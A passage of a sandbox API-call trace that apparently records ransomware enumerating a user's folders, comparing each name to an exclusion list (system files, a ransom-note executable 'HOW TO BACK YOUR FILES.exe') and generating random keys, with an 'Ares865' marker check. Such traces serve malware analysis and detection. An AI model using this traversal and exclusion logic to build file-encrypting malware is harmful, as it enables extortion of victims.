hTemplateFile=0x0) returned 0x118 [0091.668] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20) returned 1 [0091.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.669] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.669] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.669] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.669] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x15c [0091.671] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0091.672] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.672] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.673] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0091.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.673] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0091.673] CloseHandle (hObject=0x15c) returned 1 [0091.673] CloseHandle (hObject=0x118) returned 1 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.674] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d15e180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d15e180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="aoldtz.exe") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="temp") returned -1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="ntuser.dat") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="perflogs") returned 1 [0091.674] lstrcmpiW (lpString1="Pictures", lpString2="MSBuild") returned 1 [0091.674] lstrlenW (lpString="Pictures") returned 8 [0091.674] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 40 [0091.674] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0091.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0091.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4e) returned 0x2edb08 [0091.674] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0091.674] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="aoldtz.exe") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="bootmgr") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="temp") returned -1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="pagefile.sys") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="boot") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="ids.txt") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="ntuser.dat") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="perflogs") returned 1 [0091.674] lstrcmpiW (lpString1="PrintHood", lpString2="MSBuild") returned 1 [0091.675] lstrlenW (lpString="PrintHood") returned 9 [0091.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 38 [0091.675] lstrcpyW (in: lpString1=0x2cce43c, lpString2="PrintHood" | out: lpString1="PrintHood") returned="PrintHood" [0091.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0091.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2edb60 [0091.675] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0091.675] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="aoldtz.exe") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="temp") returned -1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="ntuser.dat") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="perflogs") returned 1 [0091.675] lstrcmpiW (lpString1="Recent", lpString2="MSBuild") returned 1 [0091.675] lstrlenW (lpString="Recent") returned 6 [0091.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned 39 [0091.675] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0091.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0091.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2edbb8 [0091.675] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0091.675] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d138020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d138020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0091.675] lstrcmpiW (lpString1="Saved Games", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="aoldtz.exe") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="bootmgr") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="temp") returned -1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="pagefile.sys") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="boot") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="ids.txt") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="ntuser.dat") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="perflogs") returned 1 [0091.676] lstrcmpiW (lpString1="Saved Games", lpString2="MSBuild") returned 1 [0091.676] lstrlenW (lpString="Saved Games") returned 11 [0091.676] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned 36 [0091.676] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0091.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0091.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df770 [0091.676] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0091.676] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="aoldtz.exe") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2=".") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="..") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="windows") returned -1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="bootmgr") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="temp") returned -1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="pagefile.sys") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="boot") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="ids.txt") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="ntuser.dat") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="perflogs") returned 1 [0091.676] lstrcmpiW (lpString1="Searches", lpString2="MSBuild") returned 1 [0091.676] lstrlenW (lpString="Searches") returned 8 [0091.676] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned 41 [0091.676] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0091.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0091.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4e) returned 0x2edc10 [0091.676] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0091.677] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="aoldtz.exe") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="bootmgr") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="temp") returned -1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="pagefile.sys") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="boot") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="ids.txt") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="ntuser.dat") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="perflogs") returned 1 [0091.677] lstrcmpiW (lpString1="SendTo", lpString2="MSBuild") returned 1 [0091.677] lstrlenW (lpString="SendTo") returned 6 [0091.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 38 [0091.677] lstrcpyW (in: lpString1=0x2cce43c, lpString2="SendTo" | out: lpString1="SendTo") returned="SendTo" [0091.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0091.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2edc68 [0091.677] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0091.677] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="aoldtz.exe") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="bootmgr") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="temp") returned -1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="pagefile.sys") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="boot") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="ids.txt") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="ntuser.dat") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="perflogs") returned 1 [0091.677] lstrcmpiW (lpString1="Start Menu", lpString2="MSBuild") returned 1 [0091.677] lstrlenW (lpString="Start Menu") returned 10 [0091.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned 36 [0091.677] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Start Menu" | out: lpString1="Start Menu") returned="Start Menu" [0091.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0091.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df7d0 [0091.678] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0091.678] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="aoldtz.exe") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="temp") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="ntuser.dat") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="perflogs") returned 1 [0091.678] lstrcmpiW (lpString1="Templates", lpString2="MSBuild") returned 1 [0091.678] lstrlenW (lpString="Templates") returned 9 [0091.678] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned 40 [0091.678] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0091.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0091.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2edcc0 [0091.678] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0091.678] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0537e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0537e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="aoldtz.exe") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="temp") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="perflogs") returned 1 [0091.678] lstrcmpiW (lpString1="Videos", lpString2="MSBuild") returned 1 [0091.679] lstrlenW (lpString="Videos") returned 6 [0091.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned 39 [0091.679] lstrcpyW (in: lpString1=0x2cce43c, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0091.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0091.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2edd18 [0091.679] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0091.679] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0537e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0537e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0091.679] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0091.679] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0091.679] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0091.679] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.679] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.679] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.679] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0537e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0537e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.679] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.679] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.679] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.679] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.679] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0091.680] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0091.680] lstrlenW (lpString="desktop.ini") returned 11 [0091.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 38 [0091.680] lstrcpyW (in: lpString1=0x2cce44a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0091.680] lstrlenW (lpString="desktop.ini") returned 11 [0091.680] lstrlenW (lpString="Ares865") returned 7 [0091.680] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0091.680] lstrlenW 